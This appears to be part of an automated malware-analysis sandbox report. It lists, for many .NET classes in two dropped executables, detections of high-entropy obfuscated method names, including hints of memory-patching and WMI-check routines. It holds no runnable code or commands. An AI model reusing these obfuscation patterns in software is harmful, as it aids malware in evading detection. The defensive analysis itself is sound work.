                  Source: 6z9uno0baqvej0me.exe.0.dr, DablsyKhVktwZXmMx.csHigh entropy of concatenated method names: 'GJKVxgQvPV', 'ydsOfJeQCVbYa', 'jderwMUjgNj', 'hdvVwjoVWGAitO', 'vuhfkkRNDlDS', 'sOwefQcBVhYr', 'FiccwyhFZpziyfQPrjtQf', 'HKWCdmGZMInzejlbpF', 'ESZwwglLleyfbFcaSGtUv', 'zcruyAgeQunfbKhNZWraUvOdM'
                  Source: 6z9uno0baqvej0me.exe.0.dr, MLOzRvMQYDeslGhSiqRrD.csHigh entropy of concatenated method names: 'CNbGrDSdnbyQMNsuzSIDmHHwh', 'OvZLrOhNIBYL', 'IyuQCtVtTZn', 'zizMvGeYkpWEckjizFqVoOA', 'rrECLNvVlUr', 'hBNvtmSTbqoSJnuOjSC', 'iuUDBcMXuBSHsEBysvbCv', 'eBDltYShmTSGwngJtRZ', 'ZZXgaFmwVnqAqCPSzPjnENPz', 'mHNRiCJczHEeWLnmWLzcSQ'
                  Source: 6z9uno0baqvej0me.exe.0.dr, wEmPlHwvhkVaXVXBaeahaqAX.csHigh entropy of concatenated method names: 'mVGvXKixJGKPShLgxTQRR', 'DSxNmbKUFEOd', 'lqAJZncNPNmHwPAcXkGTdSoxK', 'GnpAGApjZqxJqeown', 'LFpMJriUIJV', 'CCzBgpYPGlSNpKfO', 'cfhejlEiudxSmsfNGouJpxzX', 'yamcXzMTageopTRvS', 'LaxUtnzjVlFEefJGlLSGW', 'kyLLAZQVdOXKnxbdgzc'
                  Source: 6z9uno0baqvej0me.exe.0.dr, YgTRUqGyvMDPAwIs.csHigh entropy of concatenated method names: 'fLfZnpCMphhn', 'QYIhRtBHNJYx', 'aZFOqCvjkyFwkrREfJYK', 'vfHTfOrARCGcHOcHbqesZ', 'ZDkgCjCizznueuyvLnDj', 'wyUdcoxESuSNOFD', 'yMIyiCHpNkiIgfqoqOdF', 'DavFehFUgPouMMb', 'ljtqfQrFoYnDdXAbxRumMsEU', 'UgVtNTSPsF'
                  Source: 6z9uno0baqvej0me.exe.0.dr, wdeXDEGcBGXHfb.csHigh entropy of concatenated method names: 'jqVCxngNkCJLbpWAhWqYuD', 'xyOjvRjBjAzlFnTqcQPtVutem', 'GploDvgqXDiDkvBAZLb', 'RMOfNIfJeCF', 'xQLtQvwEFOPPHZfTsUVhC', 'NtbFavQWMUxzGUkHkeOX', 'CxyYocLRKhXhODRSKUBoiCuSI', 'LjljqTfjLwdhlSE', 'BnZRrQTpaJN', 'QzCgPWRcgaqEBfsUpcii'
                  Source: 6z9uno0baqvej0me.exe.0.dr, IGWfOAHKzj.csHigh entropy of concatenated method names: 'INjbkoTBDyDO', 'wmyuTvpUiWQ', 'AqsFUenQBM', 'jQbBhUpDFsQjcCMqDunZrTYk', 'bwjUQxEkrOeruIAtSLKjHQCIo', 'WOmDPsrEFYFjpvLyknhzJ', 'nfYHNBqLubgfaqxoymzqC', 'njWPXIgOaoblaGeIeq', 'udeDJVVBvovzTj', 'rpkydhffArEoP'
                  Source: 6z9uno0baqvej0me.exe.0.dr, rLSyZeyiGXQodFFJuqzb.csHigh entropy of concatenated method names: 'jiyzoISeTlwlTJHcrob', 'USYqMKRKXONmGEIdT', 'kWfDmmUCJvyhCCXCIQJHndrHH', 'XJeOBdItDFt', 'fmWJBVMqMKPDwrT', 'LGfXvhOKYuuUY', 'ySJrkXlecVvR', 'NuaSKKwiwZWWyXLlHbsRDMx', 'FGwbheKbdoBQxbkKcbBtmUmA', 'sUuCAqAxgNDNVASPu'
                  Source: 6z9uno0baqvej0me.exe.0.dr, OdvZLjiZSxuvnfJkBWEwenrQv.csHigh entropy of concatenated method names: 'fijjjKQXRKunlovkWbVST', 'LZySRCSamfdbDzqjOj', 'QOzqOlQAtRPudQCWKkQ', 'NEqXPJJkwumNlnDOMjkhBCZ', 'XkAKBcgzxqRL', 'cbFbgDyeBJpNnKbAj', 'LehAeIziTOnQvWrqkIfFVya', 'VbKwNSFzNyFgqcwwcxk', 'rlNTWxaSVeWNEDeCxCUBJ', 'CwQKAHLidYNqmjOraQrmdj'
                  Source: 6z9uno0baqvej0me.exe.0.dr, GcBxRdNtfCWHQtExiPKZUa.csHigh entropy of concatenated method names: 'UoExhHdtqM', 'UOdaJDZllFLdPIOCZ', 'ESTgchINgf', 'CJgurZpUIFGAjovILppSE', 'qmuFomvRwXt', 'iwfiXjYiQx', 'RkrgZxXqMgzStzlkDYqIiHiFy', 'cRGuWmspdUwFWUYggT', 'dmjmyVKapOKCmiwUGkSK', 'ZEWQoxBWjBaOV'
                  Source: 6z9uno0baqvej0me.exe.0.dr, QKvpyubntApnPp.csHigh entropy of concatenated method names: 'hJIcmsLfiJhZvvAbDBp', 'EspKISPavnCRQTuIAPHUFeMfR', 'fssYmmasapUyUTdk', 'vGQIcAsanuVsafJtmmWhX', 'QrXtFoCunr', 'uRZAMDsAxysEAAJK', 'hgGDNtqZliv', 'YsGdXfOksaj', 'hZDYmWtvexNGkRhXjba', 'xwZFlbcUvaMHxcVo'
                  Source: 6z9uno0baqvej0me.exe.0.dr, ZuoBsZuxQp.csHigh entropy of concatenated method names: 'SHBkDQrVYFDLTTvsBYvfZhpj', 'gYWmBNPyZhN', 'eYHZjmwWjUiwgs', 'UKVlSRfWsUjXsoNul', 'eXAnGpvsNVMqZFIouoEv', 'wyBPEAPEhWawOBVYhDgqZEKK', 'vdPEtYqpni', 'yXCofnfzmtLDmPNkX', 'VrorOIWAAox', 'GaTxaJBrKlYKXHkacogoS'
                  Source: 6z9uno0baqvej0me.exe.0.dr, UyrKerXTOPAkHBLRj.csHigh entropy of concatenated method names: 'xHcODEjHiYWqy', 'EJpsKwGfhupd', 'CWdwiUYXYwGunaX', 'zwXQtgyMSHnF', 'aiYamglEcoWajfM', 'xWVjWixRMYWYRdbhSFyO', 'UBulEWIBpJBldVkRWvrk', 'NNKMnyMpHegy', 'cVbxSLpQXO', 'moIqPwJGdaGnkZQY'
                  Source: 6z9uno0baqvej0me.exe.0.dr, DyVsvFOlHVfMrKKxFhxnMGPwa.csHigh entropy of concatenated method names: 'UOBIcuNOdorNUcDDOJeNW', 'qYfMcxmwjYSJ', 'zjzslzdhWFsNVkIsGRNPM', 'ccPRPbgETvKrDUPQt', 'taUTnzHNdEdHFu', 'cGWdTkCARmxCdhocp', 'zVlDJpQJCxcbMpQSb', 'snadrZDgqxdgpb', 'jFYnYxhMJhEYpaHmKFbkBx', 'eLzczTgVIAncjrfC'
                  Source: 6z9uno0baqvej0me.exe.0.dr, EUTyJunaVjfLziLg.csHigh entropy of concatenated method names: 'eegtQQmoHQzAznEMVfEOJG', 'mpQAlxnqMRkwy', 'boDgKBdnaWv', 'yeCGRgXTuEzQBqUZmj', 'rGItrBizEhyPuE', 'yIoFzEYfJXome', 'hEAqHDUqkLFihTmv', 'FMrrLlhjKTbyWDODeXcxYm', 'qIYdzRWFsN', 'iancWTTHxksrOIrfCwJy'
                  Source: 6z9uno0baqvej0me.exe.0.dr, lQeQOakgBgLnYzXnYfwvsoR.csHigh entropy of concatenated method names: 'ztAfILOSPvBxRhPeW', 'MOeRMzlJYbiMAxz', 'RUaFYpRtYdy', 'WrPRZbbCvihAtymmk', 'uExMQuEQsX', 'ksiBLnhMQnYVxJimZMZCeIVit', 'JaUNIjEFKpyzhLFaUO', 'iADiIeETUScXAHje', 'rCfpRrzsnaeO', 'DoGMLbGsMiDQjmiSyrxhyjRjg'
                  Source: 6z9uno0baqvej0me.exe.0.dr, nKgpeZgSTykSYtSbbSV.csHigh entropy of concatenated method names: 'wDxqnrGACQoWOIdDYryoSu', 'fvaMQMFUkvxj', 'NqBnSgQCKODPQODjTgXBu', 'vNfpnxwEaRYtqip', 'WmeGVgWwAxClQ', 'ZipuvnHcsSGGnm', 'XYVuIKkXoxOripqvKnMrqDv', 'BDttLzPtjGdYgqIEpKBxgw', 'mCXvSbuzTdisEQrLo', 'UHcLROUfHCfCyGFfGrnE'
                  Source: 6z9uno0baqvej0me.exe.0.dr, telTuMtmMwDpKCkMfRoN.csHigh entropy of concatenated method names: 'rIpEftCdsi', 'wFYJaLGHcSGHka', 'HsDemLphCVvPOTqI', 'NptFeblULhkjlAEd', 'lKZNwCHXWnevr', 'lJltvhPdRRKadExRUrmDhg', 'GQmmhInHYUtyazGIvwIs', 'CWYCaESmJnFF', 'fdJvhUdKlFkFXSOiqH', 'naDuNjHDVUPhntyTd'
                  Source: 6z9uno0baqvej0me.exe.0.dr, KUSnSKgmYFGAeAocidYkujJO.csHigh entropy of concatenated method names: 'dQTkcSfTfReMTMW', 'nbVGmtdTwMWaBBaKDUp', 'NCwnahzjKPORBEGInIgjnznQ', 'FRdqTJzXcSlfifFutJhxFYwv', 'XvoFGNOfrVPVsrG', 'tYmVdFcbptqGSr', 'UiYwNLRWFWzqKpYBRajL', 'KaoSTMQMWINAounTvtDcBgydO', 'lQsYfjfhKIjetyA', 'iOmqWulhWhfiy'
                  Source: 6z9uno0baqvej0me.exe.0.dr, RBUgQcjHqRKyAa.csHigh entropy of concatenated method names: 'LEZdqsNhpolJzZovnnEEjVKsk', 'dNRuNpUSUgxp', 'VETfseTjhBW', 'KvVPptgskOzQubwoh', 'IxxijAPqSNQ', 'wMuWCtzCfmQwUGED', 'RifCcsZacMVzybScNSnVY', 'CoeYVhANcvLGBflUT', 'VvZhdDhLxUGoQiM', 'fqYEWraOjZnranqtzUzczUK'
                  Source: 6z9uno0baqvej0me.exe.0.dr, QUoppAEiUBFBpPJBwNJfiPqyc.csHigh entropy of concatenated method names: 'XCJldFJktkEUIpCWsEd', 'VqhiakofQAepMKcCYjXArEW', 'wbFUcMXlVkJgUbLtQ', 'UsGPHxNAxJgdAQTIlyf', 'CEdsUcAvhxYejMke', 'hUHGcOOErjsNMpM', 'vcQONvexRSAkCt', 'gppDeXNZpPncsHiVHLQnkT', 'EmpKpJNdCywMXW', 'ipiCazaSmpixsZmFDNZkR'
                  Source: 6z9uno0baqvej0me.exe.0.dr, sMngcJoYCfD.csHigh entropy of concatenated method names: 'NqoQEpSsTwLvYLG', 'xShVFAtygovIPJLQgVcbDDWW', 'slwAsIRDrakyhLMxpjPu', 'dKlvODjesuvKn', 'OxyogdEXiaSyJP', 'OTHcXObKFdFiZzgonux', 'zrviQGGcKdQtTAebnhQynmsKb', 'fYBmeELReWXYMQIzAcMLOZUF', 'FdzKMykHUb', 'aYyMhCVHDPVzqomQyPhF'
                  Source: 6z9uno0baqvej0me.exe.0.dr, bemziMhmpmMerLdV.csHigh entropy of concatenated method names: 'yWKGRtOTIcUqxtNSNbPM', 'VlsSCCkNTeEwH', 'asNKkYgakMwrszLdjNJ', 'clSoOreFoxQtpOmZ', 'RfoevAfVKJ', 'CquqnmCpaYvttbmmwDCeM', 'cSiUrhknSEhtDyDZFDMxz', 'VmuCINiRIfYQOcITvV', 'mFrLzYojXyy', 'OlAwvZoYWEBvCVm'
                  Source: 6z9uno0baqvej0me.exe.0.dr, tGwhiEvIelEIF.csHigh entropy of concatenated method names: 'qbVYeRUeKDssh', 'pMIWvEsBuMeRjSQsQVFHT', 'oFjNrOwtopXJTSciMBTog', 'uMiCORmWmZSD', 'CmiNdFBXotZyyPiIE', 'eFfLXfoAeGRCxqQuavenpi', 'lFSIEPBDNikoxsrPCYd', 'uFlvihEpneQzvauFEW', 'lcCDUMCTCigbPMHkfTWaW', 'LQjRlsXxmKgor'
                  Source: 6z9uno0baqvej0me.exe.0.dr, BElgoLHogWQNwYHuUgCDSGRK.csHigh entropy of concatenated method names: 'baJZzPuRxNSmGjUn', 'WwdzYoCecRRlcvn', 'LNlxOgGVwyKpHOwiPA', 'VgVDlHuXycgVReLuWjpDp', 'HDZeMXNUjVcLStqJzqUIIt', 'dsKvTayZwufZRe', 'uXKetLtGMREM', 'yighOovmCbttlvfRmUZfr', 'xyezEkmydPNOaONyKdiVrvQk', 'PNoZxfgsClhC'
                  Source: 6z9uno0baqvej0me.exe.0.dr, jzPbPTOKMYzy.csHigh entropy of concatenated method names: 'BvqjRKKKxZ', 'uDiLLLnYqoyNDjxaBj', 'wrmnqWmDlFvylaogMkC', 'BkbHODinAUkJbTciHPsoYHCSv', 'MmOCkpyjdMQfZnozDQVlXS', 'GYxsNbthILYqvZxjuKrpQRcqF', 'ZElxJSupIe', 'xkIkeITAwsaGhaafcgowHm', 'BowLBFwFQTwxZi', 'mJJpIHzxEXj'
                  Source: 6z9uno0baqvej0me.exe.0.dr, YsWKUSVaFowa.csHigh entropy of concatenated method names: 'tTvXthIVExoTsvxLtZ', 'UtwrBhuHZMwXhFxGlCAkunm', 'vhqbXXOMOCFiwbtp', 'ajIHaHOvoMItpzhHbwUrSjByk', 'ezPJJJKkTDdM', 'acfiKFTZDYaUeZyh', 'iJXRcOgfCziEfddPbtOmBrs', 'iabooejMDcVUpDx', 'zCHFkVYvxFDfju', 'qQGiBmsqYPWBDHJaXvAnyj'
                  Source: 6z9uno0baqvej0me.exe.0.dr, dSDmXFmcLQpf.csHigh entropy of concatenated method names: 'ziEklDxOoeZAgCB', 'dMTBarzvetSRkatBLDS', 'snqYEtpndmqDlxhEVdqHjJFrk', 'dOlYockDlpWvwgCLSsC', 'fmspfiNKNjhynY', 'bCFyNThLshagJF', 'rNpUAqVvsGPZpBHXH', 'QaIMtowybAHFBDEps'
                  Source: FixerNerest.exe.0.dr, GprCBzVajSFPhcvMz.csHigh entropy of concatenated method names: '_003CPatchMem_003Eb__0', 'WYpgNUnjwEYMhBcgWYlMeqbwj', 'NMmrnMiPoxTKxWYciysWlr', 'QuyKVUgxswZG', 'wFQLeSMeNMbPoBIdEM', 'WEVxpCMvIA', 'NYQxfchgsTfdDiXvhS', 'UokWjXaHbJRXEemyC', 'rWfvXTjrbSPRGfcjfldCgaFVG', 'bwbyQjVwqwtZQQnsv'
                  Source: FixerNerest.exe.0.dr, AgGuxbclsJDKUXCF.csHigh entropy of concatenated method names: 'PgBtGwUrqzqNZCUoKeqOHE', 'uciUipnmdWskfbbukmD', 'bmYTGiVKsMrg', 'AGRXclBCMNqgS', 'NikFbDwDHDPNAUcuQfMZeU', 'XHABEPZhmotIb', 'GPcOxzNHOlha', 'wLTsKsYMybBrniW', 'ZGMAlKPjKgVwPtOUex', 'VTvjPDvIobXKQreofUZ'
                  Source: FixerNerest.exe.0.dr, KxxSSIzaCTUHBCvRNLqyDXZ.csHigh entropy of concatenated method names: 'TgaEpLqydIyuWCaHNS', 'mhcftdlvvpWnmYUymhulqdVe', 'DBvKkjllbnvrAhbEPuJHUMW', 'DoZThFJLym', 'cqlKFkCKkYHlzTgbiMWYrf', 'GwJSDWdksNryOejDXSBlcvDZ', 'AeaycOxxwe', 'wRyoHoPXIUSwyJ', 'GqtQKsjSDrClPzuBRzVHFUMdo', 'fRfhhcpdIHDfTVMzuwE'
                  Source: FixerNerest.exe.0.dr, tisnIiXyTCXvDDO.csHigh entropy of concatenated method names: 'iJnrHhQxpVf', 'afkSbpIpfAFPRx', 'noTZewWYBUkKLSu', 'nCHXoSFTOuYXiEXaKQdIWwBTE', 'ixrewXlCRNJa', 'VizKjXzqwwJAvplcqA', 'ThjHbjxAmgmKQjnHaWlSvE', 'lAieBizZaMVHvlb', 'blXMJJmtQIhLFFisO', 'xGtFwRnGMyucrWz'
                  Source: FixerNerest.exe.0.dr, VoFTVipipkK.csHigh entropy of concatenated method names: 'VMantYKYfAnacPRV', 'DQtAcwiaBZQaoUKaKqmcuoiCw', 'VBfrFRUkmUQUsPsMs', 'uxqfdzRZesDOhrECbhuJTzFEi', 'JqyWkhvjIzjpXfagmbhXmZ', 'pnKSjfvrmxnpaaI', 'VSyjETmJOjmM', 'XKDkZJjZPMDNHwrkpzF', 'SLEoqLVAADzsiNPmkFB', 'YjGGuVxXvZYkgiL'
                  Source: FixerNerest.exe.0.dr, LORYroboCXxqjpTmhsXqFkvZK.csHigh entropy of concatenated method names: 'ArLDvgByOLypWkkSBihjSpzIh', 'sVsaSsNtokczcRpk', 'HnrWmGmiNsaeLrDWco', 'GntGbcwzpCGPthOrUpx', 'OFrFznPcsZc', 'cJemOhQupG', 'gGchxxzjgeiQBwoGoNUHQZGnk', 'bdmZCQIHLyX', 'RftpwVtscqZ', 'bgVzgHzpwtVVwHbSIt'
                  Source: FixerNerest.exe.0.dr, DDkXafHupjcDyMCFpVaefrMq.csHigh entropy of concatenated method names: 'qCGRdOsVhMwopUbX', 'jnSGDElovbagPMrtBj', 'BdLVjhRzGQzBzHCIZY', 'nyUdhmSpSAEunk', 'WzXRjZmEfXvZaZNDSVmwdgzei', 'ryzBWMRAkCkHopA', 'pFlNsPEwmZBoUpAtjShnEdBj', 'aoKTKgxvjqts', 'YbuDOwKdfuCrXWHN', 'LECFRbtdbtDslzGBOtFtAP'
                  Source: FixerNerest.exe.0.dr, OLCRwsTtwxxSGZuMngxi.csHigh entropy of concatenated method names: 'STWcrGlCPAYMVdXTCakSo', 'EXEssEuclOoxwsgoE', 'hrgwYFkwWskGMPwuOyYzO', 'HnPKYYhfmOVykwrHyyHw', 'BreCYBCdhQEYAjshOhMP', 'FWkNfzCGAZsRAFwkIzWfBFx', 'akNzakQugqwUtot', 'zXhqLGzdww', 'hqkpAZTnumC', 'PJylKJbrTFUfeXGFTkj'
                  Source: FixerNerest.exe.0.dr, nkKpBsREeeBrrJgLniKFn.csHigh entropy of concatenated method names: 'uPkrNGBgDoNjgrSgOmrox', 'tJdcdXdhIRyApvFJfLCy', 'NeIdpsHUXOypNVbNkc', 'CWfvlfBXaEHglzFgfUz', 'eWMkDzLcZdwuiYvEhiXynU', 'QQiNpHpwtlozgKuslTZ', 'xINxNDBywxBAJqvUUmWUkgDJu', 'PumplfOWiICkzlGrA', 'jnpqOZXzwFOQFDDpoHLGLWmn', 'nSkmkNsgHZHi'
                  Source: FixerNerest.exe.0.dr, OwtFvyBkOpRRzc.csHigh entropy of concatenated method names: 'DCLFoZlKenZ', 'CgtqbJuoLKkbarxoqh', 'DPnuJlizndmPSVVyDVyqH', 'ottRkewcwTw', 'VNPmkFsKHL', 'uSFFsuTsreybuBsAE', 'LgTSRzIjQl', 'yxycUyyfZDhdaFWXlVkrEnH', 'eFcBGwJdizthAyZDtVfydDsN', 'bXOgtpKpCyPWwYcuEvaLpXmv'
                  Source: FixerNerest.exe.0.dr, vTsoiPoBagCkfnEE.csHigh entropy of concatenated method names: 'AGXlggLTczEETmLnHvVvVfz', 'mWyAVsqBZzpXkkPmgUG', 'kxGurwXriJVUHrz', 'iLyjICeTwnCWg', 'PAZiupPEJYUySQeVQtlE', 'VVWHiSmxDuA', 'zuUuYwJudBaOK', 'OpbXJlbeueDbMWdHGeUn', 'WKarwbKbTvHxyEx', 'fkPjVAprxknRWuwu'
                  Source: FixerNerest.exe.0.dr, ogkoRtQNRnFHYCnvNGTSgt.csHigh entropy of concatenated method names: 'oOnwkySUEoBZ', 'FbzfjIHajOZmiphQxTIvYwZdx', 'PySATXdopmGojYmgFAO', 'CIkEHUteZJBVi', 'tIIivBJtzvJ', 'kjJrrZPneGNO', 'yezOgklGffdYWEMAIJpuxjJ', 'iRcFuZmutpwXKfSL', 'DEEgSUUCmWwYUvPUe', 'OHfLGsiehHoqcrdVufF'
                  Source: FixerNerest.exe.0.dr, kInYBznLcEoeuDSs.csHigh entropy of concatenated method names: 'yWUqFwYbPOyiIfALmotlTxK', 'HotTDfGtAOhQjefMP', 'llpcTYoSIOZGWAMxiQCEYjHEi', 'yjcHJgWWMZheVUekXsTtrgDl', 'PKKYCdkuYaEqAEsjzonPDvhZ', 'MOkoDSgqLuWMxJvwkwuZtW', 'bKrrQWsTclkpOAGVIYAoKW', 'BerTTzmzuqbJeLaPU', 'ataNUgweamBthdE', 'pNYDZUplqznqbKiJgWjdw'
                  Source: FixerNerest.exe.0.dr, lXExsaLrgYgEOOXK.csHigh entropy of concatenated method names: 'UwIbcfQhBviOX', 'cHxslOlqBYCceRobCYTdkZ', 'sJroPreddJ', 'ExRVmvaevkZzBzsZtJvtC', 'FFjtaVzWuZ', 'tMqKgmXDGeRTJqp', 'SlThPiCsLlsVFfYpz', 'ImBOMWYqvXnlaDlyglar', 'KKyyvuBxbFb', 'ciCUDZwJZneFaLpk'
                  Source: FixerNerest.exe.0.dr, gBeJmXXsXHezdPh.csHigh entropy of concatenated method names: 'eUDcfhQyzzyEOUmAxDQN', 'lmsKaeQoSgVylMzBA', 'ylfJmZSeDVdBZyULthLSE', 'zJhSdFcHmyx', 'RbrbzTrwbvLRHWe', 'TSqihvmVcUvMBwjeEI', 'sUSisaIcEyQLGbCoUIOk', 'pVzfXfueLgNzqmFBk', 'HYSiXLJplyIPVpYJDzSCVvNxs', 'DMQpwnjLGLEHynW'
                  Source: FixerNerest.exe.0.dr, EwsvuuRydySCmvfwUdTl.csHigh entropy of concatenated method names: 'LvCpvdStvFLfKcjkzIm', 'OTwhHeTfhdsyCEsB', 'FyRyFitGWcSvLUVgQQryVi', 'JmLRMNcFjivuJUW', 'lDakBAkVJWRm', 'BDUXhIMuQgtuWjNQaMLtHF', 'uxPICpIqvpSiebWbMKOUWhpf', 'XFiKFsgvIZZSAJE', 'qxEEAioEkzjt', 'ZNIkqfjZfpxlmWCwJMAJM'
                  Source: FixerNerest.exe.0.dr, QEEFRJhvySTxMB.csHigh entropy of concatenated method names: 'aDNCrkYOApwXNfzcDoeqHTo', 'oCobulrMvsWPQUkcspDQVmTP', 'qPIhKkHPTNpwwUPxjcUJjMjEB', 'SPXYCiYcDViflIPAwGugvUoSl', 'zGPegEfLRrrvL', 'YTQtPErLujPc', 'VCxaFmsjSNZp', 'zZqXIBvmIbEvDhSnLgO', 'uKIUQmISYFG', 'DlFRVWaOgWNasfBFZvGhKmi'
                  Source: FixerNerest.exe.0.dr, jZWTVmmWOyYUMMRcqrgzxt.csHigh entropy of concatenated method names: 'ebNNwrzjWnUktguoiZGMylOI', 'MzLyzOspersHZpfP', 'CgscXvwDxaqhwt', 'EtksnlWZbuPoC', 'JjbxjihQroDOuBnCHhy', 'CfFmbefHRhIGuXnrOkM', 'foCvoYqUlZmiq', 'dedoVFDazJgwUXNwn', 'UoAOcJxCnKWrvaQXt', 'NZOHHEpsPsET'
                  Source: FixerNerest.exe.0.dr, jDcxkJFhdsO.csHigh entropy of concatenated method names: 'ZVTlUGzgCUxzHTc', 'pLyoVESOrBkIzZvCXj', 'MjNkMsfBPGdpQhesSuawUD', 'tSVqgcZubYd', 'rcalvpCDHNMTbV', 'dIxnVJfTSqCzYpMCRmRm', 'rIfGRAwfFCOKvw', 'dlIGMIHvsqeNvLvgKjRlA', 'gDJinMnnodsaYge', 'ZHjMmPnmBUKWD'
                  Source: FixerNerest.exe.0.dr, MtweeSvrtsEjaEHkGcqcH.csHigh entropy of concatenated method names: 'DFiwVYdhZUOx', 'YRQgkFOHierWZwABKbbd', 'prwiwWNMSkU', 'WiSpwGWsAVaqZwccgP', 'nUcjaUxnjBuPuXuCNhLNUEk', 'TQFIAukgDrh', 'uzsVyTnrFFfT', 'tOuUBXikZPJPpmpQNMD', 'mIOpqPBQtyOkldHfpMBTyX', 'jjGJgybrtcetlAFe'
                  Source: FixerNerest.exe.0.dr, OtMRnVOsGKHl.csHigh entropy of concatenated method names: 'OaJVtSKEyPaxQqAqb', 'AYiHvMpChJPGtAijBpNMbGp', 'PelUWeNCfT', 'MqHfxgrkBosV', 'OhpLdOPujgrRaUfDv', 'batVtuKPgkWnNX', 'LFppCYRDMdKP', 'XMLhFbQvgtnuBN', 'fYvSTJOOqNtoKWgrjexs', 'YohmHMfMBuBLjYoi'
                  Source: FixerNerest.exe.0.dr, JjNonPeEqnKrhUWFcwVNuQ.csHigh entropy of concatenated method names: 'HumVdnzFHHCRoAp', 'svjgfSSfzqHTWdUvtQGtB', 'ARrhDkeCiEmKcSLjnocHVmgf', 'dmHYXtvlxuSoyPhAxICh', 'ACkJcSRtYNlMy', 'yXeKLqZfXsupYuHYed', 'WcjXOvberZhhczpjdSyrrmVer', 'ntXmAjHObxOzPP', 'MiFqKSpjKeFflGkGFfAIh', 'EYyZNYrUdCjH'
                  Source: FixerNerest.exe.0.dr, vFtGvLdAuIQGYPbHNoGtunigD.csHigh entropy of concatenated method names: 'BohTfzMQNzNDrnTSGfvSzctK', 'kQyFHWNDAJoSadRuICctK', 'SabgDkkwZvXjuiNKFdAzqdeAg', 'eYraQRZnxY', 'aScSDktvqiigxwzsKGo', 'bABGMFyeFKHlpgfKXhntlEpT', 'rteRYOhIcCZRWGymOqgbxrQR', 'VdTvKWLhKVLUNhvZcMeFtB', 'oHXOIsyzcMdCkONSfO', 'LkmRAIkBVfmMuUCeomICo'
                  Source: FixerNerest.exe.0.dr, XbJdqTwlJhtvvHI.csHigh entropy of concatenated method names: 'cQQnOSFXJkniwgH', 'CtFVrLKWlIexEaFmY', 'XIDtCEWlTGfNocZTtBCm', 'QGuBFnHTjfAKNJzVJr', 'yFrEqYTCXk', 'DklHGCJsxQPSkbeDbSax', 'JAoVYBDdlljjCbQYGCxMQ', 'kjnHdLUsjxmwujwliAFPLefi', 'AOfUQdlTPQFhRYrItCmw', 'ggbUUwGBiGD'
                  Source: FixerNerest.exe.0.dr, TpneWzinmRLNNvomkAusssN.csHigh entropy of concatenated method names: 'IuRdXCfNaLeGuJEFSv', 'zBBLzbjMHFiAa', 'LVbhFPjlxnBRhsbwpa', 'gOaHiRBnqYIrKDfincXNfcODN', 'itrkLPIDuNlOt', 'DctNpwrNCJoTRM', 'EzXtYjIvFMsiHJS', 'ZjHKDiBNRSUriwsyvlpNOUUgv', 'oBwNkEkMPjJCOVyJcFO', 'NITunVTEjEPbPXu'
                  Source: FixerNerest.exe.0.dr, WpAqmEEzEwNIXIzRzOYiu.csHigh entropy of concatenated method names: 'xCQxqDhktAiNXUabbXDUuhnau', 'tGJXUzpZsyZoNASUCMZJk', 'rXnAeZCPPqDFKaaVgjX', 'ccBmJDCafaAkANPljUVQWcijl', 'pstggqmlDOVB', 'aXcjopSFwKplLNHcztSABNK', 'zuKyOKBQidutustuTCsh', 'uUcfJDVDApN', 'ukueUqmJZDiTO', 'GzXhyUcdEZiTEGfMhohg'
                  Source: FixerNerest.exe.0.dr, avfHckAjbIOftjcvbDvZXrf.csHigh entropy of concatenated method names: 'YzCIvbnXWQBODZHdYFCd', 'NKwQlKHrQVjPyjchr', 'zUrIdiNsBvRASoBJKpGrKQ', 'fFvSzEqevhRCJgEhNCs', 'LZQDuOpYnbzd', 'oLDhQOoLRVSAlscGHspR', 'UGprXkORrUhn', 'UVAzxnEwuDxCIVNR', 'jKMaTENqsdZuZBlNSYH', 'IuBMMaCspOP'
                  Source: FixerNerest.exe.0.dr, XOWrfubIFwwWSRBCkfv.csHigh entropy of concatenated method names: 'GzXbQMXAGN', 'mwxeQIuYrPpc', 'GQHFLAVEzNYYrvaTWaCrnJZ', 'mltpHDkRXfUAESpG', 'DniZGZMUFVonkExqmSZGgxv', 'HBMaaOElvzkVqvgMhVB', 'wdmaXKSzPzMGrFRFNlur', 'DrkUbzqmNZKwMhd', 'lDQvEVvmdeleaz', 'aKSslBFwKbMBaBKeYorbievL'
                  Source: FixerNerest.exe.0.dr, NCWTJiYmOo.csHigh entropy of concatenated method names: 'fdXRNOXStt', 'qgnMDAxeooZwPsjKWKTw', 'HeaGYfIPuIRJgLpfweYojzNG', 'HZdEBIZwljCMFeUpPufH', 'jgteZfvHMIRUZRGeLtArN', 'cnSrADyUFhyuYskZbceoZalr', 'NOLEAfPZoEGMifrIrDjW', 'tOumSXNYVBCaKnpnQEC', 'UkodNsxnfhXBVBUzRSiH', 'ASCDlYsCVb'
                  Source: FixerNerest.exe.0.dr, JfAFbFqmPAXuSFACrag.csHigh entropy of concatenated method names: 'RkDnIXrgyetV', 'sVHoXFlXRvG', 'epDDikiPXN', 'cMxDNKolHBpajsOTV', 'kzpwkehncPuKFgfxebaBXNcK', 'ApPTLUQNUnNjgcSWaiYqwwIum', 'msUXXWfxkpRTRu', 'xktSOyzIexfETCEgVhx', 'YsxQqEirdEGQdNzLPcYO', 'kpZrSLvgIwlTMEEnccKQHe'
                  Source: FixerNerest.exe.0.dr, UACsUQnggztSoYk.csHigh entropy of concatenated method names: 'VdSINmzcYlFUDFbLWy', 'fqUxahHlBoZLppD', 'uGVDiBZTjLSdbYhvpFF', 'AgsaFAyozZPezcgFBvkeR', 'OOOdKcHeWj', 'QcOOuxhClUJvodzrcutVa', 'zRdMbqVhVDgujzRq', 'yCbfgETazKke', 'cNJvcwliVrhEyGPuuzaln', 'TzpSNJlcfkClbSkoWUFYdLub'
                  Source: FixerNerest.exe.0.dr, fxrViPtroaCbyONKrcHijo.csHigh entropy of concatenated method names: 'cGXWrGRrNpktfJDBwyi', 'MCfobByeOtYEqSPP', 'tBkWiomOVhBoa', 'kBSSZbjvpHncU', 'gCNtoqDwxzdOsZF', 'xqoioCXzpobxMdjF', 'ViSUHzkHnEToLiJp', 'JxolcdfNDAPGjTPY', 'XrnzqqEbAxDKeGRHrTmQisEn', 'DzUADkEQRKS'
                  Source: FixerNerest.exe.0.dr, qmajBmcCnsP.csHigh entropy of concatenated method names: '_003CCheckWMI_003Eb__4_0', 'akoWoQJegFQzWGz', 'sLLtHQapfaLkpD', 'GhBLeixaxKaECT', 'FDgyYJtcIK', 'yqNEYpdrKSVuU', 'ukOigLYWdVIEqeEMEsBU', 'HMsllbLJjkILQeYfubylc', 'swUyynxOdtAxn', 'VxvjMMtlztaAfhKQC'
